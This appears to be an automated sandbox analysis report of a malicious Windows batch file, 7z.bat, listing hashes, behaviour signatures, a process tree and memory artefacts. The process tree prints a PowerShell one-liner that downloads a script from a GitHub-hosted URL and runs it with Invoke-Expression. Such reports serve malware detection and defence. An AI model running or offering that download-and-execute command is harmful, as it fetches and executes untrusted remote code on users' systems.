Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 06:22

General

  • Target

    Files/Apps/7z.bat

  • Size

    844B

  • MD5

    1c451e2da79fef2d9321de2ea7b45441

  • SHA1

    d88c4420afd5ac5817d1ddf704ff662b91f2972d

  • SHA256

    bbd164eb4e0d58b109e765d9a2278c8cfcbc4096bbe75de823db05c2caa47b6e

  • SHA512

    0202c51a522665a0986bf6b0c9ed7497d0aa796f6cc9c085c40962c333e77f9cc309319d0487b800b9981f5932a109f62ab075088df55560285438bb7aef1751

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/SchooiCodes/file_hosting/main/7z.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Files\Apps\7z.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\system32\fltMC.exe
      fltmc
      2⤵
        PID:2208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ver
        2⤵
          PID:2300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "$PSVersionTable.PSVersion.Major"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "$wc = New-Object System.Net.WebClient; $script = $wc.DownloadString('https://raw.githubusercontent.com/SchooiCodes/file_hosting/main/7z.ps1'); Invoke-Expression $script"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2400

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCEML27RXS98UHZV58WK.temp

        Filesize

        7KB

        MD5

        5f1d7d635bbefc94576803d36438e097

        SHA1

        23bc9af59c519941c190f270082bd07228e0d915

        SHA256

        6558498a7e72fafc0755553b32e1264f608d454ee231d59c457d7dc8dbf6bbe7

        SHA512

        bd05d777f4bf201231b6565b25fc336cf557c236b5cc3c9c45bd9eaef0d2c86cb68557a6b9b8766ed6c0ee2efc3ef1cefc3ca07f8d41fec78fbe36e238e2ec9d

      • memory/2204-4-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

        Filesize

        4KB

      • memory/2204-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

        Filesize

        32KB

      • memory/2204-5-0x000000001B720000-0x000000001BA02000-memory.dmp

        Filesize

        2.9MB

      • memory/2204-7-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

      • memory/2204-8-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

      • memory/2204-11-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

      • memory/2204-10-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

      • memory/2204-9-0x0000000002A4B000-0x0000000002AB2000-memory.dmp

        Filesize

        412KB

      • memory/2400-20-0x000000001B550000-0x000000001B832000-memory.dmp

        Filesize

        2.9MB

      • memory/2400-21-0x0000000001F50000-0x0000000001F58000-memory.dmp

        Filesize

        32KB